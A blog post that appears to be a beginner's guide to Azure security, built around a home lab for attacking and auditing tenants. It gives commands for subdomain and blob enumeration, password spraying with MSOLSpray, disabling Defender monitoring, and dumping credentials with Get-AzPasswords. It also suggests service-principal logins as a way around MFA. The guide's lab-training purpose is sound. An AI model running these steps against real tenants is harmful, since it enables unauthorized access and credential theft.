Getting Started with Microsoft Azure Security: Attacking and Auditing
This blog post summarizes beginner-friendly ways to get hands-on with Microsoft Azure Security. It compiles useful resources for upskilling, including creating a home lab, practicing attacks and audits, and preparing for relevant certifications.
As innovation increasingly relies on cloud technologies, securing these environments becomes vital for maintaining customer trust and encouraging investment. Microsoft Azure stands out as one of the leading public cloud platforms, making Azure Security skills highly sought-after and widely valued.
When considering a career in Microsoft Azure Security, understanding the salary landscape can help set expectations and inspire skill development. Based on European market data from January 2025, the average base salary for Microsoft Azure skills in Spain is €45k/year. Key skills include identity management, incident response, infrastructure as code, and cloud security architecture.
For more precise results, search for "Azure Security" on LinkedIn with specific country filtered, check out other job salary research tools, and explore Microsoft Security Partner job boards.
Lab Setup:
This post introduces a lab focused on attacking and auditing Azure, serving as the first in a Cloud Security series of posts. Rather than covering all tools and techniques, it highlights a selection of sample open-source tools. It’s not a comprehensive step-by-step guide but a collection of notes designed to help you get started with hands-on Azure Security as quickly as possible, along with guidance to continue your individual exploration.
To set up an Azure lab with temporary infrastructure and identities, you can use an environment of your choice or refer to the following resources of my choice :) :
- Infosec Skills Cloud Pentesting Project [7-day trial available]
- SANS Pen Test Austin 2023: Workshop - Building Azure Security Labs using Terraform
Image 01: SANS workshop detail:
Additional learning resources with Terraform samples are listed at the bottom of the blog.
If creating a lab from scratch, you’ll need:
- An Azure subscription:
Sign up at https://portal.azure.com, activate your subscription, and enable MFA to secure your account. - A VM with the Azure CLI tool, Git, Docker Engine with docker compose, and Terraform installed.
- Install dependencies: AZ module, MSOL module, AzureAD module.
Then, clone and import MicroBurst:
Image 02: Welcome to Azure dashboard, Choose your Subscription, activate MFA detail:
Attacks:
1. Anonymous Attacks:
Using MicroBurst, a PowerShell tool by NetSPI for pentesting Azure resources:
cd C:\Tools git clone "https://github.com/NetSPI/MicroBurst" cd .\MicroBurst Import-Module .\MicroBurst.psm1 2>$null
Invoke-EnumerateAzureSubDomains -Base ncaa -Verbose Invoke-EnumerateAzureBlobs -Base staticsite
Image 03: Install missing AZ, import MicroBurst, MicroBurst Enumerate:
2. Finding Azure Credentials:
Conducting a Password Spray Attack using MSOLSpray:
- Clone the tool and prepare the environment:
#[when running MSOLSpray on Windows add: Set-MpPreference -DisableRealtimeMonitoring $true ] mkdir -p ~/Tools cd ~/Tools rm -rf MSOLSpray git clone https://github.com/dafthack/MSOLSpray cd MSOLSpray
az ad user list --query "[].userPrincipalName" -o tsv > users.txt
[#az logout] Import-Module ./MSOLSpray.ps1 Invoke-MSOLSpray -UserList ./users.txt -Password 'DunderMifflin123$' #[There's a match, we have FoundUser1 and FoundUser2! login as the user FoundUser1] #exit
Image 04: MSOLSpray detail:
Keep in mind that starting 10/15/2024, all users must use MFA to access the Azure portal.
As we'll explore shortly, you'll have better chances of bypassing this requirement by using methods like Service Principal credentials, where MFA is not yet enforced.
Image 05: Azure Mandatory MFA detail:
3. Privileged Attacks:
As authenticated FoundUser1, with privileged admin credentials we can:
- Dump domain information using MicroBurst:
cd C:\Tools\MicroBurst pwsh Import-Module .\MicroBurst.psm1 2>$null Connect-AzAccount Connect-AzureAD #Add domain exceptions in case of any browser errors, and once you are authenticated, run the following commands: cd ~\Desktop Get-AzDomainInfo -Verbose cd Az start .
Image 06: Dumped Azure database detail 1:
Depending on the privileges user has, more or less data will be dumped. We can get to that conclusion by reviewing users details and assigned roles in the dashboard. Here's how it looks if we dump the data with the highest privileged user:
Image 07: Dumped Azure database detail 2:
4. Credential Escalation:
Using compromised FoundUser2 credentials:
- Log in, explore, try to find credentials in cleartext:
# [let's now logout MScott, and az-login as the other user we found with password spraying: https://learn.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-login ] #az logout az login --use-device-code # [insert FoundUser1 PVance' email address and the valid password, DunderMifflin123$ ] # In case PVance user can get to cleartext credentials from for example, the Azure Container Registry, their Reader role has access to: # sp_contributor_user=g7ng36726-8a72-0483-1802-974919640e8e # sp_contributor_pass=m.O6Q~CqiUTNcghtyuFR.txNdMMRwoxsGthT~aYJ # now authenticate as that Service Principal: #https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference tenant="$(az account show --query 'tenantId' -o tsv)" az logout az login --service-principal -u "$sp_contributor_user" -p "$sp_contributor_pass" --tenant "$tenant" # with that we could escalate PVance's privileges and now as a Contributor, we could for example proceed with
Get-AzPasswords -ModifyPolicies Y -Verbose | Export-Csv -NoTypeInformation .\credentials.csv
Audit:
1a. Using Prowler CLI:
Install and run Prowler from Azure CloudShell:
- See Prowler CLI documentation for Azure CloudShell
- Download full report files and review:
Image 08: Install Prowler CLI detail:
Image 09: Obtain Prowler CLI reports detail:
In the table here you can find Prowler's syntax for available Azure services, frameworks and categories.
Also, see Tutorials Docs for a list of available compliance frameworks.
1b. Using Prowler App:
I installed Prowler App on Kali Linux 2024.4:
- First, prerequisite, install Docker Engine with docker compose:
for pkg in docker.io docker-doc docker-compose podman-docker containerd runc; do sudo apt-get remove $pkg; done sudo apt-get update sudo apt-get install ca-certificates curl sudo install -m 0755 -d /etc/apt/keyrings sudo curl -fsSL https://download.docker.com/linux/debian/gpg -o /etc/apt/keyrings/docker.asc sudo chmod a+r /etc/apt/keyrings/docker.asc echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/debian bookworm stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null sudo apt-get install docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin #[just to verify it works:] #sudo docker run hello-world
curl -LO https://raw.githubusercontent.com/prowler-cloud/prowler/refs/heads/master/docker-compose.yml curl -LO https://raw.githubusercontent.com/prowler-cloud/prowler/refs/heads/master/.env docker compose up -d
Image 10: Install Prowler App detail, it could take some time depending on your internet connection, expect 5+ minutes:
Sign up locally, sign in, configure scanner, trigger a scan, and review results:
Image 11: Configure Prowler App and scan:
That wraps up this post!
From here, you can dive into the attached learning resources and continue your exploration:
Learning Resources:
1. Official Microsoft Resources:
- Security Virtual Training Days
- Certification Learning Paths
- Terraform samples for Azure
- Career Paths
- Azure operational security checklist
2. Additional Non-Microsoft Resources:
- PurpleCloud Network Azure labs: Installation + Labs Generators
- SANS Aviata: Making the Switch to Azure Monitor Agent Workshop + Chapter 6 Manual
- Introduction To Azure Penetration Testing by Nikhil Mittal (Altered Security)
- SANS Quick Wins in Cloud Compliance: Azure Webinar + Website
- Black Hills Information Security Webcast: Getting Started in Pentesting The Cloud: Azure
- Black Hills Information Security Webcast Reconnaissance: Azure Cloud w/ Kevin Klingbile
- Terraform for Azure tutorial
- INE AzureGoat attack and defense manuals
- Cloud Academy (QA training) - Azure Security hands-on labs
- Pwned Labs - Azure Security hands-on labs